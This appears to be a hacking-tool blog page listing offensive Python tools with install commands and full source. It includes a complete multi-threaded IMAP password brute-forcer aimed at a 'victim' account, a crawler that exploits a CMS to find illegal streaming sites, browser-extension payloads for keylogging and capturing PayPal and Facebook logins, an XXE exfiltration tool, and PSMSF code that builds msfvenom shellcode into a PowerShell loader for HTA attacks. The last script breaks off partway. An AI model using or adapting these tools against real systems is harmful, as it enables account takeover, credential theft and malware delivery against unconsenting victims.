Changelog 6/1/2016:
+ iptv_gui.py : removed _dev from name
+ Update requirements.txt
+ add pastebin crawler
+ Update iptv.py

Cli iptv-on-windows

iptv-gui

IPTV is a simple python script that let you crawl the search engines in order to fetch those sites that stream illegal tv programs.
This script leverage the fact the a lot of those sites use the same CMS to create the web application and sharing the service, behind a CMS there’s always some exploits. We are using one simple exploit to grab and crawl the site’s url and use for our purpose.

How to use:

Clone the repository git clone git@github.com:Pinperepette/IPTV.git
cd into IPTV
run pip install -r requirements.txt in order to get the full dependencies
run python iptv_cli.py
python iptv_gui.py

update
cd IPTV
git pull

Source : https://github.com/Pinperepette | Our Post Before

NOTICE : PLEASE USE IT ETHICALLY.

Multi-Threaded IMAP Brute Forcer with the ability to send a text message to you if or when the password is found.

All Platform Support: WIndows, Unix/Linux and Mac OSX.

Usage: imapbrute.py [-h] [-eU EUSERNAME] [-eP EPASSWORD] [-eS SMTP] [-n NUMBER] [-u USERNAME] [-Is SERVER] [-f PATH]

Installation:

git clone https://github.com/tylerp96/IMAP-Brute && cd IMAP-Brute
python imapbrute.py -h (for Print Helper)

imapbrute.py Script:

'Author: Tyler Price'

import imaplib
import sys
import threading
import thread
from Queue import Queue
import time
from termcolor import colored
import os
import smtplib
import time
import argparse

# Usage:  imapbrute.py [-h] [-eU EUSERNAME] [-eP EPASSWORD] [-eS SMTP] [-n NUMBER] [-u USERNAME] [-Is SERVER] [-f PATH]

parser = argparse.ArgumentParser(description = "IMAP Brute Forcer By: Tyler Price")
group = parser.add_argument_group('required arguments')
group.add_argument('-eU', action="store", dest="eUsername", help="Personal Email Username")
group.add_argument('-eP', action="store", dest="ePassword", help= "Personal Email Password")
group.add_argument('-eS', action="store", dest="SMTP", help="Personal Email Server")
group.add_argument('-n', action="store", dest="number", help="Personal Phone number")
group.add_argument('-u', action="store", dest="username", help="Victim Username")
group.add_argument('-Is', action="store", dest="server" , help="IMAP Server Address")
group.add_argument('-f', action="store", dest="path", help="Wordlist Path")

print colored("\nAttention: Enter -n as number@mms.att.net = AT&T number@vtext.com = Verizon number@messaging.sprintpcs.com = Sprint\n", "red")

args = parser.parse_args()

if args == None:

	print parser.print_help()

	sys.exit(0)

eUsername = args.eUsername
ePassword = args.ePassword
SMTP = args.SMTP
number = args.number
username = args.username
server = args.server
path = args.path

Server = server

server = smtplib.SMTP(SMTP, 587)
server.ehlo()
server.starttls()

server.login(eUsername, ePassword)

def SucessMessage(username,password):

	server.sendmail(eUsername, number, username)
	server.sendmail(eUsername, number, '[!] Login Sucessful ' + password)

def crack(username, password):

	lock = threading.RLock()

	try:

		with lock:

			mail = imaplib.IMAP4_SSL(Server)

			mail.login(username, password)

			print colored("[!] Login Sucessful User: %s Password: %s" ,"green") % (username, password)

			print colored("[!] Exiting...", "yellow")

			thread.start_new_thread(SucessMessage, (username, password, ) )

			time.sleep(1)

			os._exit(1)

	except imaplib.IMAP4.error:

		print colored("[+] Login Failed User: %s Password: %s", "red") % (username, password)


def Worker():

	while True:

		password = q.get()

		crack(username, password)

		q.task_done()

filename = open(path, 'r')

q = Queue()

for x in range(1, 20):

	t = threading.Thread(target=Worker, args=())
	t.daemon = True
	t.start()

for x in filename:

	q.put(x)

q.join()

print colored("[!!!] Attack Complete...Password Not Found", "yellow")

server.sendmail(eUsername, number, username)
server.sendmail(eUsername, number, '[!!!] Attack Complete...Password Not Found')

NOTICE : PLEASE USE IT ETHICALLY.

Source : https://github.com/tylerp96

This software is necessary for learning and improving skills and knowledge of attacks on information systems and to conduct audits and proactive protection. The need to develop domestic Pentest framework – accessible, affordable, high-confidence – is long overdue. Therefore, for domestic (as well as to friendly domestic) markets IB was created EAST framework. EAST is a framework that has in its arsenal all the necessary tools to operate a broad range of vulnerabilities from the Web to a buffer overflow. From other similar instruments EAST is simple and easy to use. To master it, and begin to develop in the field of information security can be even a novice researcher!

EaST GUI v0.9.5 Current Version

Main characteristics:
+Security framework! Software used for information security must be a high level of user confidence. The EAST is implemented open, easily verifiable source code for Python. it is used for all components of the framework and modules. In this relatively small amount of code simplifies the verification of any user. During installation no changes in the OS is not performed
+ Maximum simplicity of the framework. Download the archive, run the main python script start.py, implementing the start-stop exploits, messaging … All management – locally or remotely through a browser.
+ Easily create and edit. The ability to edit and add modules and exploits “on the fly” without restarting. Code module body is simple and minimal volume.
+ Cross-platform + minimum requirements and dependencies. Tested on Windows and Linux. I should work wherever there is Python. The framework contains all the dependencies and “pulls” ext. libraries.
+ Full functionality of the classic framework Pentest! Despite the simplicity and “no congestion” – has in its arsenal of all necessary means to operate a broad range of vulnerabilities from the Web to a buffer overflow.
+ Great opportunities for capacity. Server-client architecture, API for messaging, support libraries – allow third party developers to create their own open-source solutions, or participate in the development of EAST.

east-cli

Exploit list:
+ ef_bitdefender_gravityzone_dt.py Directory traversal
+ ef_cogento_datahub_afd.py Arbitrary File Download
+ ef_e_detective_afd.py Arbitrary File Download
+ ef_easyfile_webserver_sbo.py Stack Buffer Overwlow
+ ef_fhfs_rce.py Remote Command Execution
+ ef_joomla_gallery_wd_bsqli.py Blind SQL Injection
+ ef_solarwinds_log_and_event_manager_rce.py Remote Command Execution
+ ef_symantec_pcanywhere_host_rce.py Remote Command Execution
+ ef_wincc_miniweb_dos.py Denial of Service
+ ef_winrar_rce.py Remote Command Execution
+ port_scanner.py Tools

Installation and Usage:

git clone https://github.com/C0reL0ader/EaST && cd EaST
python start.py
then open your favorite Browser for GUI.

Source: https://github.com/C0reL0ader & http://eastfw.com/

Horus is a security framework for pentesting android Apps.

A mobile pentesting framework written in Python.

Latest Change 9/1/2016:
+ Updated requirements
+ Integrated and using androwarn
+ Fixed all androguard issues

TOOLS INCLUDED
+ androguard as the main static analyzer backend
+ androwarn
+ androbugs framework

Example Horus analysis

Installation:
1. Clone the repository (git clone https://github.com/delta24/horus)
2. Install virtualenv. (the package name maybe different depending on the distro)
3. Set-up a virtualenv, say env by running mkvirtualenv env -p /usr/bin/python2.
4. Activate the virtualenv source env/bin/activate.
5. Install dependencies using pip install -r requirements.txt.
6. Create a DB based on the models, python manage.py createdb.
7. Run the Flask server using python manage.py runserver

Source : https://github.com/delta24

PyScan is a simple web vulnerability scanner you can start scan with python script :
– python PyScan.py -u “http://site.com” –all (All payload scan)
– python PyScan.py -u “http://site.com/index.php?id=1” -s -p [ID PAYLOAD] (Single scan with payload ID)
– python PyScan.py –database ( Scan all link on database )

Pyscan

requirements:
+ xampp, lamp etc…
+ mysql
+ urllib2
+ BeautifulSoup
+ requests

Installation:

download PyScan-Scanner-master.zip
unzip it
copy into htdocs (xampp/lampp folder)
import database


TODO:
Change database information
$bdd = new PDO('mysql:host=localhost;dbname=pyscan', 'user', 'password');

Update a Python gate
panel_url = "http://localhost/pyscan/"
gate_scraper = "cmd/gate.php"
gate_scanner = "cmd/scan.php"
gate_vuln = "cmd/vuln.php"
gate_payload = "panel/api/payload.php"
gate_database = "panel/api/database.php"

Username: root
password: toor

Download : PyScan-Scanner-master.zip
Source : https://github.com/graniet

doork is a open-source passive vulnerability auditor tool that automates the process of searching on Google information about specific website based on dorks. doork can update his own database from ghdb and use it for find flaws without even contact the target endpoint. You can provide your custom wordlist and save the output anywhere.

latest version doork v2

requirement:
– Python 2.6 & 2.7
– All OS Support

Usage:

git clone https://github.com/AeonDave/doork doork
pip install beautifulsoup4
pip install requests

python doork.py -h

Update:
cd doork
git pull

Source: https://github.com/AeonDave

Changelog v1.2.2: Fixed HTTP error 503 by injecting common browser headers.

iptv-v-1-2-2

IPTV is a simple python script that let you crawl the search engines in order to fetch those sites that stream illegal tv programs.
This script leverage the fact the a lot of those sites use the same CMS to create the web application and sharing the service, behind a CMS there’s always some exploits. We are using one simple exploit to grab and crawl the site’s url and use for our purpose.

Updates IPTV

How to use:

Clone the repository git clone git@github.com:Pinperepette/IPTV.git
cd into IPTV
run pip install -r requirements.txt in order to get the full dependencies
run python iptv_cli.py
python iptv_gui.py

update
cd IPTV
git pull

Source : https://github.com/Pinperepette | Our Post Before

LynxFramework is an operating tool for web browser offering a specialized service in the effect browser extension development , namely Google Chrome and Firefox soon. The operation is based on the script for the injection in the order to retrieve data targeted.

LynxFramework:
has been tested on windows, MaxOSX, Ubuntu, And Kali 2.0

ONLINE PAYLOAD:
+ XSSKeylooger keylooger xss
+ ForceDownload force file download
+ paytoweb www.paytoweb.com
+ Paypal https://www.paypal.com/signin/
+ Facebook http://facebook.com

usage:

git clone https://github.com/graniet/LynxFramework && cd LynxFramework
python LynxFramework.py
set:payload (what do you want)
then open your chrome browser..

Source: https://github.com/graniet | https://lynxframework.com/

The Simple SQL Injection Vulnerability Scanner helps to find SQL injection vulnerabilities within a website. It is basic and intended for educational use.
Features:
+ Scan a single URL per time
+ Detect SQL injection vulnerabilities within a website with parameters
+ User agent for web requests
+ Easy to use, everything is automated
+ Error handling for http requests
+ Display a short scan report
+ Check if the provided URL is reachable

usage:

git clone https://github.com/rouabas/SQLInjectionScanner && cd SQLInjectionScanner
python sqli_scanner.py

Script:

#!/usr/bin/python

import sys,  re,  urllib,  urllib2,  string
from urllib2 import Request,  urlopen,  URLError,  HTTPError
from urlparse import urlparse

# Define the usage, the first thing a users sees if he/she starts the script without any parameter
def USAGE_PRNT():
    print ""
    print ""
    print "________________________________________________"
    print "Simple SQL Injection Vulnerability Scanner"
    print ""
    print "Version 0.0.1 (January 29th, 2013)"
    print "________________________________________________"
    print ""
    print "[!] Use parameter --help for help!"
    print "[!] Use parameter --about to learn about this software"
    print ""
    print ""
    return
   
# Define the help message
def HELP_PRNT():
    print ""
    print "The Simple SQL Injection Vulnerability Scanner helps"
    print "to find SQL injection vulnerabilities within a"
    print "website. It is basic and intended for educational use"
    print ""
    print "Usage example:"
    print "sqli_scanner.py -u \"http://site.com/test.php?id=x\""
    print ""
    print "Options:"
    print " -u <URL>              (starts the scanner)"
    print " --help                (displays this text)"
    print " --about                (displays this text)"
    print ""
    print "Features:"
    print " - Scan a single URL per time"
    print " - Detect SQL injection vulnerabilities within a website with parameters"
    print " - User agent for web requests"
    print " - Easy to use, everything is automated"
    print " - Error handling for http requests"
    print " - Display a short scan report"
    print " - Check if the provided URL is reachable"
    print ""
    return

# Define the banner which is printed when the tool was started with parameters
def BANNER_PRNT():
    print ""
    print "________________________________________________"
    print "Simple SQL Injection Vulnerability Scanner"
    print "GNU GENERAL PUBLIC LICENSE"
    print "SQL Vulnerability Scanner by Rouabah Basset is"
    print "Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>-"
    print "Everyone is permitted to copy and distribute verbatim copies"
    print "of this license document, but changing it is not allowed"
    print "Use this onlty for educational purposes."
    print "________________________________________________"
    return
#Define about page
def ABOUT_PRNT():
    print ""
    print "Script version Beta"
    return
    
# We test if the url is reachable
def URL_TESTING(Site_URL):
    # Define User-Agent variable
    user_agent = "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
    
    # Adding the User-Agent to the HTTP request
    Get_URL = urllib2.Request(Site_URL)
    Get_URL.add_header("User-Agent",  user_agent)
    
    # Now let's do the HTTP request
    print "[i] Checking if a connection can be established..."
    try:
        http_URL_test = urllib2.urlopen(Get_URL)
    except HTTPError,  e:
        print "[!] The connection couldn't be established."
        print "[!] Error code: ",  e.code
        print "[!] Exiting now!"
        print ""
        print ""
        sys.exit(1)
    except URLError,  e:
        print "[!] The connection couldn't be established."
        print "[!] Reason: ",  e.reason
        print "[!] Exiting now!"
        print ""
        print ""
        sys.exit(1)
    else:
        print "[i] HaHaa XD, Connected to target! URL seems to be valid."
    return

# Scan the provided URL for a SQL injection vulnerability
def URL_SCANNING(Site_URL):
    # I defined some variables needed for detecting MySQL errors in the source code
    SQL_ERR_1 = "You have an error in your SQL syntax"
    SQL_ERR_2 = "supplied argument is not a valid MySQL result resource"
    SQL_ERR_3 = "check the manual that corresponds to your MySQL"
    PARM_EQ = "="
    PARM_SGN_1 = "?"
    PARM_SGN_2 = "&"
    TRIGGER_ERR_1 = "'"
    TRIGGER_ERR_2 = "-1"
    
    # I defined dict which will list all vulnerable parameters
    VULN_PARAM = {}
    
    # I defined the variables needed to craft URLs for exploitation (if there is at least one vulnerability)
    exploit_urls = list()
    
    # I defined User-Agent variable
    user_agent = "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
    
    # Adding the User-Agent to the HTTP request (via GET) 
    Get_URL = urllib2.Request(Site_URL)
    Get_URL.add_header("User-Agent",  user_agent)
    
    # Starting the request
    try:
        CALL_HTTP = urllib2.urlopen(Get_URL)
    except HTTPError,  e:
        print "[!] The connection could not be established."
        print "[!] Error code: ",  e.code
        print "[!] Exiting now!"
        print ""
        print ""
        sys.exit(1)
    except URLError,  e:
        print "[!] The connection could not be established."
        print "[!] Reason: ",  e.reason
        print "[!] Exiting now!"
        print ""
        print ""
        sys.exit(1)  
    
    # Storing the response (source code of called website)
    FULL_HTML_CODE = CALL_HTTP.read()
    
    # Paring the URL so I can work with it
    PARSED_URL = urlparse(Site_URL)
    print ""
    print "[i] Moving on now."
    print "[i] Server/Domain is:",  PARSED_URL.netloc
    if len(PARSED_URL.path) == 0:
        print "[!] The URL doesn't contain a script :("
    else:
        print "[i] Detected the path to the script :) :",  PARSED_URL.path
    if len(PARSED_URL.query) == 0:
        print "[!] The URL doesn't contain a query string :("
    else:
        print "[i] Detected the URL query string :) :",  PARSED_URL.query
        print ""
    
    # Searching it for MySQL errors
    SRCH_SQL_ERR_1 = re.findall(SQL_ERR_1, FULL_HTML_CODE)
    if len(SRCH_SQL_ERR_1) != 0:
        print "[!] SQL error in the original URL/website found."
        print "[!] There might be problems exploiting this website (if it is vulnerable)."
    
    SRCH_SQL_ERR_2 = re.findall(SQL_ERR_2,  FULL_HTML_CODE)
    if len(SRCH_SQL_ERR_2) != 0:
        print "[!] SQL error in the original URL/website found."
        print "[!] There might be problems exploiting this website (if it is vulnerable)."
    
    SRCH_SQL_ERR_3 = re.findall(SQL_ERR_3,  FULL_HTML_CODE)
    if len(SRCH_SQL_ERR_3) != 0:
        print "[!] SQL error in the original URL/website found."
        print "[!] There might be problems exploiting this website (if it is vulnerable)."
    
    # Finding all URL parameters
    if PARM_SGN_1 in Site_URL and PARM_EQ in Site_URL:
        print "[i] It seems that the URL contains at least one parameter."
        print "[i] Trying to find also another parameters..."
        
        # It seems that there is at least one parameter in the URL. Trying to find out if there are also others...
        if PARM_SGN_2 in PARSED_URL.query and PARM_EQ in PARSED_URL.query:
            print "[i] Also found at least one other parameter in the URL."
        else:
            print "[i] No other parameters were found."
        
    else:
        print ""
        print "[!] It seems that there is no parameter in the URL."
        print "[!] How the hell am I supposed to find a vulnerability?"
        print "[!] Please provide an URL with a script and query string."
        print "[!] Example: target/index.php?cat=1&article_id=2"
        print "[!] Hint: I can't handle SEO links, so try to find an URL with a query string."
        print "[!] Exiting now!"
        print ""
        print ""
        sys.exit(1)
    
    # Get the parameters
    PARAMS = dict([part.split('=') for part in PARSED_URL[4].split('&')])

    # Count the parameters
    PARAM_CNTR = len(PARAMS)
    
    # Print the parameters and store them in single variables
    print "[i] The following", PARAM_CNTR, "parameter(s) was/were found:"
    print "[i]",  PARAMS
    print "[i] Starting to scan the provided URL(s) for SQL injection vulnerabilities."
    print ""

    # Have a look at each parameter and do some nasty stuff 
    for index, item in enumerate(PARAMS):
        # Now modify the original URL for triggering MySQL errors. Time to start your prayers XD
        print "[i] Probing parameter \"",  item, "\"..."
  
        # We now have to solve the problem that we can not modify tuples in the way we need it here.
        # We therefore copy the content of the query string (of the provided URL) into a new string.
        # The string can be modified as we like it :) Afterwards we only have to put the original URL together again.
        # Python is great! isn't it?
        QUERY_FOR_REPLACE = "".join(PARSED_URL[4:5])
        MODIFIED_QUERY = QUERY_FOR_REPLACE.replace(PARAMS[item],  TRIGGER_ERR_1)

        # Put the URL together again
        TRIGGER_URL_1_P1 = "".join(PARSED_URL[0:1]) + "://" #http
        TRIGGER_URL_1_P2 = "".join(PARSED_URL[1:2])         #www.site.com/test.php
        TRIGGER_URL_1_P3 = "".join(PARSED_URL[2:3])  + "?"  
        TRIGGER_URL_1_P4 = "".join(MODIFIED_QUERY)  
        TRIG_URL_1 = TRIGGER_URL_1_P1 + TRIGGER_URL_1_P2 + TRIGGER_URL_1_P3 + TRIGGER_URL_1_P4

        # Calling the modified URL
        try:
            HTTP_CALL_TRIGGER_1 = urllib2.urlopen(TRIG_URL_1)
        except HTTPError,  e:
            print "[!] The connection could not be established."
            print "[!] Error code: ",  e.code
        except URLError,  e:
            print "[!] The connection could not be established."
            print "[!] Reason: ",  e.reason
    
        # Storing the response (by .read we get all the source code of called website)
        HTML_CALL_TRIGGER_1 = HTTP_CALL_TRIGGER_1.read()

        # Searching the response for MySQL errors
        SRCH_SQL_ERR_TRIGG_1 = re.findall(SQL_ERR_1, HTML_CALL_TRIGGER_1)
        SRCH_SQL_ERR_TRIGG_2 = re.findall(SQL_ERR_2, HTML_CALL_TRIGGER_1)
        SRCH_SQL_ERR_TRIGG_3 = re.findall(SQL_ERR_3, HTML_CALL_TRIGGER_1)
        
        # If the first method was not successfull we simply try the next one
        if len(SRCH_SQL_ERR_TRIGG_1) == 0 and len(SRCH_SQL_ERR_TRIGG_2) == 0 and len(SRCH_SQL_ERR_TRIGG_3) == 0:

            MODIFIED_QUERY = QUERY_FOR_REPLACE.replace(PARAMS[item],  TRIGGER_ERR_2)
            TRIGGER_URL_2_P1 = "".join(PARSED_URL[0:1]) + "://"
            TRIGGER_URL_2_P2 = "".join(PARSED_URL[1:2]) 
            TRIGGER_URL_2_P3 = "".join(PARSED_URL[2:3])  + "?"
            TRIGGER_URL_2_P4 = "".join(MODIFIED_QUERY)  
            TRIG_URL_2 = TRIGGER_URL_2_P1 + TRIGGER_URL_2_P2 + TRIGGER_URL_2_P3 + TRIGGER_URL_2_P4
            try:
                http_request_trigger_2 = urllib2.urlopen(TRIG_URL_2)
            except HTTPError,  e:
                print "[!] The connection could not be established."
                print "[!] Error code: ",  e.code
            except URLError,  e:
                print "[!] The connection could not be established."
                print "[!] Reason: ",  e.reason
            
            # Call the modified URL and look for MySQL errors
            HTML_CALL_TRIGGER_2 = http_request_trigger_2.read()
            SRCH_SQL_ERR_TRIGG_1 = re.findall(SQL_ERR_1, HTML_CALL_TRIGGER_2)
            SRCH_SQL_ERR_TRIGG_2 = re.findall(SQL_ERR_2, HTML_CALL_TRIGGER_2)
            SRCH_SQL_ERR_TRIGG_3 = re.findall(SQL_ERR_3, HTML_CALL_TRIGGER_2)
            
            # When nothing was found show this message
            if len(SRCH_SQL_ERR_TRIGG_1) == 0 and len(SRCH_SQL_ERR_TRIGG_2) == 0 and len(SRCH_SQL_ERR_TRIGG_3) == 0:
                print "[i] The parameter \"",  item,  "\" doesn't seem to be vulnerable."
        
        else:
            # Add the vulnerable parameter to the report variable
            print "[+] Found possible SQL injection vulnerability! Parameter:", item
            VULN_PARAM[index+1] = item
                   
    # Generate a short report
    if len(VULN_PARAM) != 0:
        print ""
        print "[#] Displaying a short report for the provided URL:"
        print "[#] At least one parameter seems to be vulnerable. "
        print VULN_PARAM
        print "[#] (Pattern: param number, param name)"
        
    else:
        print ""
        print "[#] Displaying a short report for the provided URL:"
        print "[#] No SQL injection vulnerabilities found"
        print "Your Website is secure from SQL Injection."

    # And exit
    print ""
    print "[i] That's it. Bye!"
    print ""
    print ""
    sys.exit(1)
    return
    # End of scan_url function
    # Function for finding the amount of columns (column fuzzer)
# Checking if argument was provided
if len(sys.argv) <=1:
    USAGE_PRNT()
    sys.exit(1)
    
for arg in sys.argv:
    # Checking if help was called
    if arg == "--help":
        HELP_PRNT()
        sys.exit(1)
    # Cheking if about was called
    if arg == "--about":
        ABOUT_PRNT()
        sys.exit(1)
    
    # Checking if scanning mode was called
    if arg == "-u":
        Site_URL = sys.argv[2]
        BANNER_PRNT()
        
        # At first we test if we can actually reach the provided URL
        URL_TESTING(Site_URL)
        
        # Now start the main scanning function
        URL_SCANNING(Site_URL)
    
### EOF ###

Source: https://github.com/rouabas

Illinois is a Scan Vulnerabilities Script for dns or ip.
requirements:
+ python 2.7
+ httplib,urllib & HTMLParser.
with optional arguments:
-h, –help, show this help message and exit
-t TARGET, –target TARGET, Target = > DNS or IP.
-p PORT, –port PORT Service Port
-d DIRETORY, –diretory DIRETORY, Diretory Listening
-v VERVOSE, –vervose VERVOSE, Show all-process runing

Usage:

git clone https://github.com/RedToor/Illinois && cd Illinois
python Illinois.py

Script:

# Illinois Scan Vulnerabilities Script 
# Author  : RedToor 
# Version : 0.0.0.1

print """
	'####'##::::::'##::::::'####'##::: ##:'#######:'####:'######::
	. ##::##:::::::##::::::. ##::###:: ##'##.... ##. ##:'##... ##:
	: ##::##:::::::##::::::: ##::####: ##:##:::: ##: ##::##:::..::
	: ##::##:::::::##::::::: ##::## ## ##:##:::: ##: ##:. ######::
	: ##::##:::::::##::::::: ##::##. ####:##:::: ##: ##::..... ##:
	: ##::##:::::::##::::::: ##::##:. ###:##:::: ##: ##:'##::: ##:
	'####:########:########'####:##::. ##. #######:'####. ######::
	....:........:........:....:..::::..::.......::....::......:::
	[Vulnerabilities Scan Script] By RedToor 
                                                                                            
"""

# timeout request
TimeoutRequest = 10
# Vervose function
Vervose="false" 
# Default Port 
port = 80
# Default Patch
Patch = "/"

from HTMLParser import HTMLParser
import httplib,urllib  
import argparse
import time 

parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", help=" Target = > DNS or IP.")
parser.add_argument("-p", "--port", help=" Service Port")
parser.add_argument("-d", "--diretory", help=" Diretory Listening")
parser.add_argument("-v", "--vervose", help=" Show all-process runing")

args = parser.parse_args()
target=args.target
port=args.port
Patch=args.diretory
Vervose=args.vervose

global Diretory , Files 
Diretory = []
Files    = []
ParamArray = ""
LDiretory = ""
LFiles    = ""
FilesArray = ""
LinksArray = ""
HTMLoutput = ""
HTMLoutputHotFiles=""
IMGfiles  = 0
HTMfiles  = 0
Dangerfiles = 0
Directories = 0

if target[:7] == "http://":
	target=target[7:]


def RequestToTarget(Patch):
	try:
		conn = httplib.HTTPConnection(target,port, timeout=TimeoutRequest)
		conn.request("GET", Patch)
		response = conn.getresponse()
		if response.status == 200:
			return response.read()
	except:
		Error="null"

class myhtmlparser(HTMLParser):
    def __init__(self):
        self.reset()
        self.NEWTAGS = []
        self.NEWATTRS = []
        self.HTMLDATA = []
    def handle_starttag(self, tag, attrs):
        self.NEWTAGS.append(tag)
        self.NEWATTRS.append(attrs)
    def handle_data(self, data):
        self.HTMLDATA.append(data)
    def clean(self):
        self.NEWTAGS = []
        self.NEWATTRS = []
        self.HTMLDATA = []


def OutputHTML(DATA, HOTFILES):
	log=open('Report['+target+'].html','w')
	HTML= """
			<html>
			<head>
				<title> Illinois Report </title>
			</head>
			<body>
				<style type="text/css">
				.top      {font-size: 22px; background-color: red; color: #FFFFFF;  text-align: left;}
				a:link      {background-color: #d7d7d7; color: black}
			    a:visited   {background-color: #d7d7d7;}
			    a:hover     {background-color: red;}
			    a:active    {background-color: #d7d7d7;} 
				</style>
				<h1><div class=top> Report ["""+target+"""] - """+time.strftime('%c')+"""</div>
			</body>
	"""
	log.write(HTML)
	log.write("<table>"+DATA+"</table>")
	log.write("<h2> Hot Files </2><table>"+HOTFILES+"</table>")
	log.close()

def ParsingToSource(Patch):
	global Diretory , Files  , LFiles , IMGfiles , HTMfiles , Dangerfiles , FilesArray , HTMLoutput , HTMLoutputHotFiles , Directories , LinksArray , ParamArray
	try:
		parser = myhtmlparser()
		parser.feed(RequestToTarget(Patch))
		tags  = parser.NEWTAGS
		attrs = parser.NEWATTRS
		data  = parser.HTMLDATA
		parser.clean()
		LFiles = " Patch : "+Patch
		for attr in attrs:
			if True:
				for name, value in attr:
					if name == "href" or name == "src" :
						Objet = value
						if Objet != "/" and Objet!="":
							if Objet[-1:] == "/" and Objet[:1]!="/" and Objet[:4]!="http":
								Check = Patch+Objet in Diretory
								if Check == False:
									Directories+=1
									Diretory.append(Patch+Objet)
							else:
								if Objet[-4:]==".png" or Objet[-4:]==".jpg" or Objet[-4:]==".ico" or Objet[-4:]==".git":
									IMGfiles+=1
								if Objet[-4:]==".html" or Objet[-4:]==".htm" or Objet[-4:]==".html5":
									HTMfiles+=1
								if Objet[-4:]==".php" or Objet[-4:]==".php5" or Objet[-4:]==".sql" or Objet[-4:]==".txt":
									Dangerfiles+=1
									FilesArray+="\t["+Objet+"]\n"
									HTMLoutputHotFiles+="\t<tr><td><font style='background-color:red;color:white;'><a href='http://"+target+Patch+Objet+"' target='_blank'>"+Objet+"</td></font></tr>"
								if Objet[:4]=="http":
									LinksArray+="\t["+Objet+"]\n"
								if Objet.find("?") >= 0:
									ParamArray+="\t["+target+Patch+Objet+"]\n"
								LFiles+="\n\t|-"+Objet
								HTMLoutput+="\t<tr><td><a href='http://"+target+Patch+Objet+"' target='_blank'>"+Objet+"</td></tr>"

		print "\t ---------------------------"
	except:
		Patrin=2
	if Vervose != "false":
			print LFiles


if __name__=="__main__":
	print " ["+time.strftime('%c')+"] Starting Scanning to ("+target+") \n"
	print " ["+time.strftime('%H:%M:%S')+"] Scanning Folders of Target..."
	ParsingToSource(Patch)
	for D in Diretory:
		if D != Patch:
			ParsingToSource(D)

	if (FilesArray!=""):
		print ("\n [Warning Files]")
		print FilesArray
	if (LinksArray!=""):
		print ("\n [Links]")
		print LinksArray
	if (ParamArray!=""):
		print ("\n [Files with Parameters]")
		print ParamArray
	OutputHTML(HTMLoutput, HTMLoutputHotFiles)
	print ("\n [Staticts Files]")
	print (" | Folders  |  Imagen Files  |  HTML Files |  Warning Files | ")
	print (" |    "+str(Directories)+"\t    |     "+str(IMGfiles)+"\t     |   "+str(HTMfiles)+"\t   |      "+str(Dangerfiles)+"\t    |")
	print ("\n ["+time.strftime('%H:%M:%S')+"] Finshed, Report in Report["+target+"].html file.")

Source: https://github.com/RedToor

Kisskissie is a tool to automate XXE exfiltration easier.You should use this tool after you have confirmed that your target is vulnerable to XXE and you wish to exfil as much data as quickly as you can.
TODO: Add more builtin attack templates. Add fuzzing capabilities. Move code into classes and general clean up.

kisskissie – XXE attack tool

Authentication
HTTP basic authentication is supported by default. Use the –auth-user flag to specify a username and you will be prompted for a password.

Templates
Some applications may require custom templates files for the smasher if they expect specific HTTP headers in the request or require a specific XML format. These should be placed in templates/smasher; if you need to specify custom headers, the filename should end in .http. For an example, see example.http in this directory.
To specify a template, use the –template flag. For example:

python2 kisskissie.py [...] --template example.http https://vuln.example.com/xml_processor

usage:

git clone https://github.com/muttiopenbts/kisskissie && cd kisskissie
./kisskissie.py -h

Source: https://github.com/muttiopenbts

Notice: Just For educational purpose only!
PSMSF can help us generate payload or files used in cmd console/browser/.. with Metasploit-Framework. If you are similar to windows cmd console, you can use the results in different areas.

powershell attack

psmsf has three attack types:
+

:  Translate a binary file into a text certification file, and restore the cert file to a binary file on target machines.
+ cert attack:  Generate metasploit console script / macro.
+ hta attack: Generate HTA html page. When victims access HTA page, os will be attacked from Internet Explorer.

helper command

Usage:

makesure metasploit framework has been install on your Unix/Linux Platform system.
git clone https://github.com/all3g/psmsf && cd psmsf
pyton psmsf.py

Script:

#!/usr/bin/python
# -*- coding: utf-8 -*-

# Please Install Metasploit-Framework first,
# Kali Linux:       apt-get install metasploit-framework
# Notice:           Just For edutional purpose
# License:          BSD License

import logging
import subprocess
import base64
import re
import os
import sys
from optparse import OptionParser
from optparse import OptionGroup
from optparse import OptionError


logging.basicConfig(level=logging.INFO, format="[+] %(message)16s")


def write_file(filename, data):
    """Write data into file"""
    with open(filename, 'w') as f:
        f.write(data)


def read_file(filename):
    """Read data from file"""
    with open(filename, "rb") as f:
        data = f.read()
    return data


def execute_command(command):
    """Execute OS Command"""
    logging.debug("Executes command: %s" % command)
    proc = subprocess.Popen(command,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE,
                            shell=True)
    data = proc.communicate()[0]
    return data


def extract_msf_shellcode(shellcode):
    """Filter some bad chars in shellcode"""
    replaces = {';': '',
                ' ': '',
                '+': '',
                '"': '',
                '\n': '',
                'buf=': '',
                'Found 0 compatible encoders': '',
                'unsignedcharbuf[]=': ''}
    for key, value in replaces.iteritems():
        shellcode = shellcode.replace(key, value)

    shellcode = shellcode.rstrip()
    return shellcode


def generate_msf_shellcode(payload, host, port):
    """generate shellcode: \x00\x00\x00...."""
    logging.debug("Metasploit Framework generates shellcode")
    command = ("msfvenom "
               "-p %s "
               "LHOST=%s "
               "LPORT=%s "
               "StagerURILength=5 "
               "StagerVerifySSLCert=false "
               "-e x86/shikata_ga_nai "
               "-a x86 "
               "--platform windows "
               "--smallest "
               "-f c") % (payload, host, port)
    shellcode = execute_command(command)

    return extract_msf_shellcode(shellcode)


def generate_powershell_script(shellcode):
    shellcode = ("$1 = '$c = ''"
                 "[DllImport(\"kernel32.dll\")]"
                 "public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);"
                 "[DllImport(\"kernel32.dll\")]"
                 "public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);"
                 "[DllImport(\"msvcrt.dll\")]"
                 "public static extern IntPtr memset(IntPtr dest, uint src, uint count);"
                 "'';"
                 "$w = Add-Type -memberDefinition $c -Name \"Win32\" -namespace Win32Functions -passthru;"
                 "[Byte[]];[Byte[]]"
                 "$z = %s;"
                 "$g = 0x1000;"
                 "if ($z.Length -gt 0x1000){$g = $z.Length};"
                 "$x=$w::VirtualAlloc(0,0x1000,$g,0x40);"
